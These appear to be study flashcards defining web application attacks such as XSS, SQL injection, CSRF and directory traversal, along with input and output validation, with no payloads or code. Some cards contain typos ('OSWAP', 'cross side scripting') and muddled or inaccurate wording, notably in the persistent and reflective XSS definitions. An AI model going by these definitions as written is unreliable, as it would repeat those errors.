Application Attacks Flashcards
XSS - cross site scripting attack
Type of application attack, this is an injection of malicious code into a web application or back-end database that will execute scripts in victim’s browser. 2 types: persistent or reflective
Directory traversal
Application attack, uses specially crafted input that includes “…/“ sequences to traverse a directory and access files or directories outside of the intended scope (OSWAP -> traversal)
Input validation
Enforcing and verifying the desired level of compliance at all stages. Input validation is the process of properly validating input from the client of environment
SQLi attack
Type of injection attack, this is an injection of SQL query (attack code) to the backend database
Output validation
Is verifying the desired level of compliance in output stages. It is used to control what is returned to the screen.
CSRF - cross site request forgery
Type of application attack, it tricks web browser into executing a malicious action on a trusted site for which the user is currently authenticated. CSRF exploits the trust that a site has in a user browser
Persistent attack
Kind of XSS (cross side scripting) attack, into. Identified webpage attacker will inject malicious code, or sent hyperlink to the victim. Victim clicks to URL and inject script and then execute script. P-XSS this is an injection of malicious code into vulnerable web api that will be executed in victims browser
Injection attack
Application attack, that tricks an application into including unintended commands into the data send to a processor/interpreter (OS, LDAP,SQL). Tricking an application into including unauthorized commands in the data sent to an interpreter processor
Reflective attack
XSS (cross side scripting) attack type, this is injection of malicious code into web application that initiates at the client side and ultimately executes victims browser
